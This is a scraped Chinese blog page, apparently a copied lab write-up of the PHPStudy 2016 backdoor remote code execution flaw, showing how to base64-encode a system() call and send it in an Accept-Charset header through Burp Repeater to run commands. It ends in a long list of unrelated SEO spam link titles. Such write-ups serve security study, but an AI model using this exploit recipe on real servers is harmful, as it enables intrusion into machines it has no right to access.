当前位置: 首页 > news >正文

免费下载1688批发网山东网络优化公司排名

免费下载1688批发网,山东网络优化公司排名,免费的培训网站建设,liunx wordpress 搭建文章目录 漏洞描述漏洞验证 漏洞描述 PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。 漏洞验证 打开phpstudy2016,用bp自带的浏览器访问www目录下…

文章目录

  • 漏洞描述
  • 漏洞验证

漏洞描述

PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞验证

打开phpstudy2016,用bp自带的浏览器访问www目录下的phpinfo.php文件,访问后结果如下:
在这里插入图片描述

然后在bp中将抓到的数据包发送到repeater模块:

在这里插入图片描述

将system(‘ipconfig’);命令做base64编码:

system('ipconfig');

编码后

c3lzdGVtKCdpcGNvbmZpZycpOw==

在这里插入图片描述

然后在repeater模块添加Accept-Charset: 字段,将base64编码放入:

Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

注意Accept-Encoding字段中gzip和deflate之间不能有空格!

在这里插入图片描述

去掉空格后点击send发送,ipconfig命令被执行:

在这里插入图片描述

http://www.15wanjia.com/news/26470.html

相关文章:

  • 网站备案查询官网如何制作简单的网页链接
  • 帮别人做网站的公司专业网络推广机构
  • 在线获取颜色代码网站北京网络营销公司哪家好
  • 做新闻微网站首页优化排名
  • 做外贸服饰哪个个网站好营销网站案例
  • iis7.5 网站配置杭州网站推广优化公司
  • 珠海做网站及推广广州今日新闻最新消息
  • dw网站设计作品深圳百度国际大厦
  • 网站建设中需求分析说明书关键词排名网站
  • 自己做网站怎么买域名电商运营怎么做如何从零开始
  • 做高大上分析的网站天津百度优化
  • 最专业的微网站开发seo优化快速排名技术
  • 做体育类网站素材站长网站
  • 深圳做网站小程序抖音seo优化公司
  • 河北监理工程师考试最新消息杭州seo网站排名优化
  • 网站开发的网站百度提交入口的注意事项
  • 19年做网站还能赚钱跨境电商平台
  • 做一个企业的网站怎么做的网络营销工具与方法
  • 南通网站开发价格刷排名seo软件
  • 广东手机网站建设公司枣庄网络推广seo
  • 请人做网站我要提供什么需求江苏seo哪家好
  • 网站优化价格广州网络推广
  • 网站制作推广招聘网络推广官网首页
  • 烟台建设信息网站百度服务中心电话
  • 好品质自适应网站建设百度招聘网最新招聘信息
  • 网站注销备案表下载国内新闻最新消息
  • 网站建设深有没有免费的广告平台
  • 阳泉网站建设公司百度游戏中心官网
  • wordpress淘宝客模板图片关键词优化的五个步骤
  • 怎么免费创建百度网站网站注册地址